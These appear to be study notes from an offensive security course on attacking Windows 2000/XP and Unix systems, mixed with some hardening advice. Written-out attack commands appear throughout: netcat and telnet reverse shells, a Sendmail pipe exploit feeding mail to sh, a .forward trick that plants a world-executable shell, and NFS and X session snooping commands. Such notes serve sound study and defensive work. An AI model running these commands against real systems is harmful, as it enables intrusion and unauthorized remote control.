IPSec Filters - built in feature which does packet filtering very early in the network stack and will drop any packets which fail to meet the rules. Only flaw is that it cannot block IKE, multicast, or broadcast traffic and can’t do port ranges. http://www.microsoft.com/technet/itsolutions/network/security/ipsecld.mspx

Enumeration
NetBIOS/SMB - System information will still be leaked unless you do 1 of 2 things. Disabling File and Print Sharing on your outbound interface will prevent nullsessions. Set RestrictAnonymous = 2 in either the registry or in the Security Policy Manager.

Eavesdropping - All authentication sent using legacy LM hashes can be easily decrypted via L0phtcrack. Also, Kerberos authentication is not used if the user specifies an IP address instead of a hostname.

SMBRelay - When trying to connect to a share/server, Windows will automatically try to log in as the current user if no other authentication information is explicitly supplied, before asking the user for a logon/password. SMBRelay will conduct a MITM attack by fooling a user into connecting to your rogue server, meanwhile after capturing the traffic it is relayed to the actual destination and back to the end user. http://www.xfocus.net/articles/200305/smbrelay.html

Denial of Service
New Registry Keys
HKLM\Sys\CCS\Services\Tcpip\Parameters\SynAttackProtect = 2 (times out syn_received faster)
EnableDeadGWDetect = 0 (prevents attacker from changing default gw) EnablePMTUDiscovery = 0 (stops hackers from lowering MTU value)
KeepAliveTime = 300,000 (verify’s an idle connection is still intact)
Interfaces\NoNameReleaseOnDemand = 0 (stops malware)
Interfaces\PerformRouterDiscovery = 0 (stop router spoofing attack)
http://support.microsoft.com/default.aspx?scid=kb;en-us;142641

Nbname - This tools puts a host in Netbios Name Conflict effectively stopping all Netbios networking on the host. Must first disable NBT on attacker machine to use tool.
C:\>nbname /astat /confilict http://www.securityfocus.com/tools/1670

Privilege Escalation
PipeUpAdmin - Pre SP2, puts current user into admin group when run from cmd prompt http://content.443.ch/pub/security/blackhat/WinNT%20and%202K/pipeup/W2KPipeUp/

NetDDE - Network Dynamic Data Exchange service allows applications to share date through “trusted shares”. Runs as SYSTEM, so arbitrary code can be attached to the request and viola your admin. Requires Visual C++.
C:\>netddemsg –s cmd.exe http://www.atstake.com/research/advisories/2001/netddemsg.cpp

Pilfering
Defeating SYSKEY - pwdump3 can extract hashes from the SAM. Also pwdump3e from ebiz can do this remotely via SMB. http://www.securityfocus.com/tools/1964/chntpw Can be used on bootable media to insert hashes into the SAM. It disables SYSKEY prior to doing this. Similar to NTFSDOS Pro. http://home.eunet.no/~pnordahl/ntpasswd/syskey.txt

Deleting SAM simply booting to an alternate OS and deleting the SAM nullifies the administrator password. DC are not vulnerable. http://www.securiteam.com/windowsntfocus/5FP0B0U1FW.html

EFS - Encrypting File System allows users to encrypt files and folders at the OS level. Cipher can be used from the CMD line. Default Recovery Key is the local admin account, however it should be stored remotely. http://www.microsoft.com/windows2000/techinfo/howitworks/security/encrypt.asp

EFS Temporary - EFS writes a temp file in plain text before encrypting a new file, however a low level disk editor like diskprobe.exe(RK) can recover the file even after its deleted because the disk blocks are not overwritten.

Exploiting Trust
LSA Secrets - lsadump2 still functions on W2K. Microsoft doesn’t consider it a problem
Multimaster Model - Within a Windows 2K forest, all domains replicate a shared Active Directory and trust each other with 2-way transitive trusts necessitated by the Kerberos implementation. Trusts between forests and NT domains are still one-way. This allows for consolidation of domains and delegation of permissions via OU’s (organizational units).

Back Doors
Trap-Dooring Path - When executables and DLL files are not preceded by a path in the registry, windows searches for them in a default order. Therefore by placing your trojaned file on the system drive, the system will launch it instead of the original file. http://www.winnetmag.com/WindowsSecurity/Article/ArticleID/9637/WindowsSecurity_9637.html

Remote Control
Terminal Services running on 3389, TS allows brute force password guessing even if a lockout policy is set. TS also allows existing connections to be hijacked if the previous user forgot to logout correctly, assuming you have their credentials.

New Stuff
Group Policy - GPO is a new 2K feature, that allows you to configure security parameters in one place to be enforced locally or on the domain. (Gpedit.msc)

Secedit - Security Configuration and Analysis tool allows admins to audit the local system security for compliance issues. It also allows you to automatically make updates and have them applied immediately.

XP Stuff
ICF - Internet Connection Firewall offers packet filtering on all inbound traffic, while permitting all outbound traffic.
Software Restriction Policy allows central control over application security to protect against various forms of malware.
Built-In Support for encrypted Wireless Networking(802.11).
MS Passport single-login solution for internet, works by using a tamper-resistant cookie for accessing all sites that support MS passport authentication.
Credential Management, WPA, Remote Desktop, UPNP

UNIX/Linux Hacking – gaining access, escalating privileges and covering tracks on *NIX system

Vulnerability Mapping is the process of mapping specific security attributes of a system to an associated vulnerability or potential vulnerability.

Nessus is a defacto standard because its free and works. http://www.nessus.org/download.html (unix & windows ports)

Remote Attacks - Exploit a Listening Service (telnet, ftp, ssh, etc)
Route Through a Unix System – circumvent a Unix firewall by source routing your packets through the firewall. Works only if system has IP forwarding enabling.
User-Initiated Remote Execution – attacks requiring user interaction, such as browsing malicious web sites or opening email attachments.
Promiscuous Mode Attacks – crafted packets can exploit your sniffer application

Brute Force - Brutus Common tool http://www.hoobie.net/brutus/brutus-download.html
John - Standard Unix Cracker http://www.openwall.com/john/

Data Driven Attacks are executed by sending data to an active service that causes unintended or undesirable results.Buffer Overflow condition occurs when a user or process attempts to place more data into a buffer than was originally allocated. This type of behavior is associated with specific C functions like strcpy, strcat, sprintf etc. A buffer overflow condition would normally cause a segmentation violation to occur. When the attack is executed, special assembly code known as the egg is sent to the VRFY command as part of the actual string used to overflow the buffer. When it’s overrun, attackers can set the return address of the offending function, to point to their arbitrary code’s memory address, which usually includes a shell command. http://www.piaffe.org/panic/

Unix Memory Dump Analysis, Good Luck http://www.phrack.org/
Aleph One’s Paper Phrack 49 http://www.securityfocus.com/tools/1500
Hell Kit for writing buffer overflows
Disable stack execution in /etc/system:Set noexec_user_stack=1Set noexec_user_stack_log =1

Heap Overflows are based on overrunning memory that has been dynamically allocated by an application. This process differs from stack-based overflows, which depend on overflowing a fixed-length buffer. http://www.w00w00.org/files/heaptut/heaptut.txt

Format String Vulnerability arises in subtle programming errors in the formatted output family of functions, which includes printf() and sprintf(). An attacker can take advantage of this by passing carefully crafted test strings containing formatting directives, which can cause the target computer to execute arbitrary commands. For example by using printf(buf) instead of printf(“%I”, buf) the system will read the first argument supplied by the user as the format string and allow arbitrary code to follow it.

Input Validation Attacks occur when a program fails to recognize syntactically incorrect input, a module accepts extraneous input, a module fails to handle missing input fields, or a field-value correlation error occurs. Often used to exploit CGI scripts or other web applications. Shell AccessX Term if enabled is the easiest way to get local gui access on a machine remotely, but may need to be combined with an exploit though. $ /usr/X11R6/bin/xterm –ut :0.0

Reverse Telnet/Netcat will both provide attackers with a back channel into the system that originates from the target host. Both require a listener to be running.
$ /bin/telnet 80 | /bin/sh | /bin/telnet 25
$ nc –e /bin/sh 80

TFTP/Anonymous FTP both will allow attacker to gain access to your machine and if a writeable/executable directory is available the system is toast. The services themselves may be vulnerable to exploits.Sendmail the standard Unix Mail Transfer Agent has been full of vulnerabilities dating back to 1988. Common attacks aside from buffer overflows, input validation, and SMTP enumeration include:Pipe Vulnerability which allows a user to escape to a shell after the data portion
Helo
Mail from:
Rcpt to: bounceData.
mail from:
binrcpt to: |sed ‘1,/^$/d’ | shdata Forward VulnerabilityCat > .forward (create forward file to ftp to users home directory)|”cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell” (creates shell executable)
$ echo hello chump | mail gk@targetsystem.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it Refer to http://www.sendmail.org/ for up to date information

RPC is a mechanism that allows a program running on one computer to seamlessly execute code on a remote system. Most buffer overflow attacks target RPC services that run as root in order to gain shell access to the target sytem. Common services exploited include rpc.ttdbserverdb(tooltalk), rpc.cmsd(CDE), rpc.statd(automount), mountd, sadmind, and snmpXdmid.

NFS allows transparent access to files and directories of remote systems as if they were stored locally. Most of the security provided by NFS relates to a data object known as a file handle. The file handle is a token that is used to uniquely identify each file and directory on the remote server. If a file handle can be sniffed of guessed, remote attackers could easily access those files on the remote system.
$ showmount –e (lists exported file systems & permissions)
$ mount :/ /mnt

Try NFSshell for more functionality ftp://ftp.cs.vu.nl/pub/leendert

X Windows System allows exporting of the local graphical display to remote users.Xscan will scan an entire subnet looking for systems with xhosts + enabled and log any console keystrokes to a local logfile. http://www.seguridad0.net/programas/X-Scan-v3.0.zip
$ xlswins –display :0.0 (will list out hex id’s for you)
$ xwatchwin -w (allows you to observe somebody else’s x session)

DNS Insecurity refer to http://www.isc.org/index.pl?/sw/bind/bind-security.php

SSH Insecurity refer to http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=SSH+exploits&type=archives

Promisious Mode Attacks are common in Ethereal, tcpdump, and several other sniffersSymbolic Link can be exploited using any program, especially SUID ones, that creates a temp file and doesn’t perform any sanity checking. By linking that tmp file to the /etc/password or shadow file, the program will update it with its permissions and not root’s.
$ strings * | grep tmp (when run in /bin or /usr/bin, will list out good programs to target)

File Descriptors are nonnegative integers that the system uses to keep track of files rather than using specific filenames (0,1,2, std in, out, error). If a file descriptor is opened r/w by a privileged process, it may be possible for the attacker to write to the file while it is being modified. To shell out of vi, execute :!sh and then modify the tmp file or run exploit code.